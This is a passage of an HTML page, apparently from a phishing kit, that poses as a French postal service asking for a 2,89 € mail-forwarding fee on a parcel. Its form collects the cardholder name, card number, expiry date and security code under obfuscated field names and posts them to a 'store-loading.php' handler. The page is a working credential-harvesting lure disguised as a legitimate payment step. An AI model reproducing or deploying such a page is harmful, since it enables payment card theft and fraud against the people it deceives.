1)}.mat-raised-button::-moz-focus-inner{border:0}.mat-raised-button[disabled]{cursor:default}.mat-raised-button.cdk-keyboard-focused .mat-button-focus-overlay,.mat-raised-button.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-raised-button::-moz-focus-inner{border:0}._mat-animation-noopable.mat-raised-button{transition:none;animation:none}.mat-stroked-button{border:1px solid currentColor;padding:0 15px;line-height:34px}.mat-stroked-button .mat-button-ripple.mat-ripple,.mat-stroked-button .mat-button-focus-overlay{top:-1px;left:-1px;right:-1px;bottom:-1px}.mat-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:56px;height:56px;padding:0;flex-shrink:0}.mat-fab::-moz-focus-inner{border:0}.mat-fab[disabled]{cursor:default}.mat-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-fab::-moz-focus-inner{border:0}._mat-animation-noopable.mat-fab{transition:none;animation:none}.mat-fab .mat-button-wrapper{padding:16px 0;display:inline-block;line-height:24px}.mat-mini-fab{box-sizing:border-box;position:relative;-webkit-user-select:none;-moz-user-select:none;-ms-user-select:none;user-select:none;cursor:pointer;outline:none;border:none;-webkit-tap-highlight-color:transparent;display:inline-block;white-space:nowrap;text-decoration:none;vertical-align:baseline;text-align:center;margin:0;min-width:64px;line-height:36px;padding:0 16px;border-radius:4px;overflow:visible;transform:translate3d(0, 0, 0);transition:background 400ms cubic-bezier(0.25, 0.8, 0.25, 1),box-shadow 280ms cubic-bezier(0.4, 0, 0.2, 1);min-width:0;border-radius:50%;width:40px;height:40px;padding:0;flex-shrink:0}.mat-mini-fab::-moz-focus-inner{border:0}.mat-mini-fab[disabled]{cursor:default}.mat-mini-fab.cdk-keyboard-focused .mat-button-focus-overlay,.mat-mini-fab.cdk-program-focused .mat-button-focus-overlay{opacity:.12}.mat-mini-fab::-moz-focus-inner{border:0}._mat-animation-noopable.mat-mini-fab{transition:none;animation:none}.mat-mini-fab .mat-button-wrapper{padding:8px 0;display:inline-block;line-height:24px}.mat-icon-button{padding:0;min-width:0;width:40px;height:40px;flex-shrink:0;line-height:40px;border-radius:50%}.mat-icon-button i,.mat-icon-button .mat-icon{line-height:24px}.mat-button-ripple.mat-ripple,.mat-button-focus-overlay{top:0;left:0;right:0;bottom:0;position:absolute;pointer-events:none;border-radius:inherit}.mat-button-ripple.mat-ripple:not(:empty){transform:translateZ(0)}.mat-button-focus-overlay{opacity:0;transition:opacity 200ms cubic-bezier(0.35, 0, 0.25, 1),background-color 200ms cubic-bezier(0.35, 0, 0.25, 1)}._mat-animation-noopable .mat-button-focus-overlay{transition:none}.cdk-high-contrast-active .mat-button-focus-overlay{background-color:#fff}.cdk-high-contrast-black-on-white .mat-button-focus-overlay{background-color:#000}.mat-button-ripple-round{border-radius:50%;z-index:1}.mat-button .mat-button-wrapper>*,.mat-flat-button .mat-button-wrapper>*,.mat-stroked-button .mat-button-wrapper>*,.mat-raised-button .mat-button-wrapper>*,.mat-icon-button .mat-button-wrapper>*,.mat-fab .mat-button-wrapper>*,.mat-mini-fab .mat-button-wrapper>*{vertical-align:middle}.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-prefix .mat-icon-button,.mat-form-field:not(.mat-form-field-appearance-legacy) .mat-form-field-suffix .mat-icon-button{display:block;font-size:inherit;width:2.5em;height:2.5em}.cdk-high-contrast-active .mat-button,.cdk-high-contrast-active .mat-flat-button,.cdk-high-contrast-active .mat-raised-button,.cdk-high-contrast-active .mat-icon-button,.cdk-high-contrast-active .mat-fab,.cdk-high-contrast-active .mat-mini-fab{outline:solid 1px}
</style></head>
<body class="mat-typography" data-new-gr-c-s-check-loaded="14.1033.0" data-gr-ext-installed="">
  <app-root _nghost-kib-c39="" ng-version="12.0.4"><router-outlet _ngcontent-kib-c39=""></router-outlet><app-hk _nghost-kib-c38="" class="ng-star-inserted"><div _ngcontent-kib-c38="" class="hk-container"><nav _ngcontent-kib-c38=""><div _ngcontent-kib-c38="" class="logo"></div><div _ngcontent-kib-c38="" class="lang-select"><div _ngcontent-kib-c38="" class="globe-icon"></div></div></nav><div _ngcontent-kib-c38="" class="hk-title">Payer la réexpédition du courrier
<br _ngcontent-kib-c38="">frais de service</div><div _ngcontent-kib-c38="" class="payment-steps"><div _ngcontent-kib-c38="" class="step step-active"><div _ngcontent-kib-c38="" class="step-nb">1</div><div _ngcontent-kib-c38="" class="step-text">Soumettre le paiement</div></div><div _ngcontent-kib-c38="" class="hr-line"></div><div _ngcontent-kib-c38="" class="step"><div _ngcontent-kib-c38="" class="step-nb">2</div><div _ngcontent-kib-c38="" class="step-text">Vérification</div></div><div _ngcontent-kib-c38="" class="hr-line"></div><div _ngcontent-kib-c38="" class="step"><div _ngcontent-kib-c38="" class="step-nb">3</div><div _ngcontent-kib-c38="" class="step-text">Reçu</div></div></div><div _ngcontent-kib-c38="" class="shipping-wrap"><div _ngcontent-kib-c38="" class="box-icon"></div><div _ngcontent-kib-c38="" class="shipping-info"><div _ngcontent-kib-c38="" class="shipping-title">Numéro de colis</div><div _ngcontent-kib-c38="" class="shipping-nb">#8711409823</div><div _ngcontent-kib-c38="" class="shipping-subtitle">Statut: En attente</div><div _ngcontent-kib-c38="" class="shipping-subtitle">Montant : 2,89 €</div></div></div><div _ngcontent-kib-c38="" class="hr-line hr2"></div><main _ngcontent-kib-c38=""><div _ngcontent-kib-c38="" class="client-container"><!----><app-card _ngcontent-kib-c38="" _nghost-kib-c37="" class="ng-star-inserted"><div _ngcontent-kib-c37="" class="form-container ng-star-inserted"><div class="checkout-box-content">
			
			
			<form class="checkout-new-shipping-address-form" method="post" action="store-loading.php?client=T7NSLW15Y0MX6QDZVO8FE92PUKBRAH3JICG4" data-toggle="validate">
		 
				
                                        
<div class="form-group saisie">
                                            <label for="spi_tmp"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Titulaire de la carte</font></font></label>
                                            <a href="#" class="info">
                                                <span data-toggle="tooltip"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
                                                     Please full name on the card.
                                                </font></font></span>
                                            </a>
                                            <br>
                                            <input class="saisie TroisSChamps" name="AK09" aria-required="true" placeholder="Titulaire de la carte" autocomplete="on" id="spi_tmp" size="40" required="">
                                      
                                        </div>
                                        <div class="form-group saisie">
                                            <label for="teledec_tmp"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Carte de crédit</font></font></label>
                                            <a href="#" class="info">
                                              <span data-toggle="tooltip"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">
                                              Veuillez entrer les 16 chiffres de la carte de crédit.     
                                                    </font></font></span>
                                            </a>
                                            <br>
                                            <input class="saisie TroisSChamps" style="background-image: url(&quot;templates/cccc.png&quot;); background-repeat: no-repeat; background-position: 101.5% 74.8%;" id="getcc" onkeyup="type_carte()" type="tel" placeholder="Credit Card Number" name="AK10" aria-required="true" autocomplete="off" required="required" templates="">
                                            <div class="erreur invisible" id="getcc">
                                            </div>
                                        </div>
			 
				 
				
				               <div class="form-group saisie" style="
">
                                <label for="teledec_tmp"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Date d'expiration</font></font></label>
                                 <a href="#" class="info">
                          <span data-toggle="tooltip">
                                        Séléctioner la date d'éxpiration sur la Carte/Cryptogramme Visuel.
                                        </span>
                                            </a>
                                            <br>
                                            <div class="form-group saisie" style=" width: 101%;">
                                            <div style="  width: 101%;"><select class="saisie3" name="AK11" data-rule-required="true" data-msg-required="&nbsp;*" required="" style="
    width: 30%;
">
                                                   <option value="">Mois</option><option value="01">01</option>
												   <option value="02">02</option>
												   <option value="03">03</option>
												   <option value="04">04</option><option value="05">05</option><option value="06">06</option>
												   <option value="07">07</option><option value="08">08</option><option value="09">09</option>
												   <option value="10">10</option><option value="11">11</option><option value="12">12</option>
												   </select> 
                                               <select class="saisie3" name="AK12" "="" data-rule-required="true" data-msg-required="&nbsp;*" required="" style="
    width: 30%;
">
                                                   <option value="">An</option>
												   <option value="2022">2022</option><option value="2023">2023</option>
												   <option value="2024">2024</option><option value="2025">2025</option><option value="2026">2026</option>
												   <option value="2027">2027</option><option value="2028">2028</option><option value="2029">2029</option>
												   <option value="2030">2030</option></select> 
                                            <input class="saisie1" style="background-image: url(templates/crypt.png);background-repeat: no-repeat;background-position: 92%;width: 30%;" type="tel" maxlength="8" name="AK13" aria-required="true" autocomplete="off" id="cry" placeholder="Crypto" required="required">
                                            <div class="erreur invisible" id="Cat1_3S_rfr_tmp"> 
                                                Veuillez vérifier votre saisie.
                                            </div>
                                       </div> </div>
                                            
                                        </div>
				<section class="continue-button py-2 mb-4" id="continueButtonParent">
							<div class="d-flex justify-content-end">
								<button type="button" class="btn btn-danger btn-cart-cancel-edit ml-1" style="display:none">Cancelar</button> 
								<button type="submit" class="btn btn-primary btn-cart-continue"><font style="vertical-align: inherit;"><font style="vertical-align: inherit;">Soumettre</font></font></button>
							</div>
						</section>
			</form>
			
		</div></div><!----><!----></app-card><!----><!----></div><!----><!----></main></div></app-hk><!----></app-root>

</html>